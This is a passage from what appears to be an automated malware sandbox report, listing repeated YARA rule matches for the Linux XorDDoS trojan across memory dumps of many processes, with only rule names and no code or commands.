        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
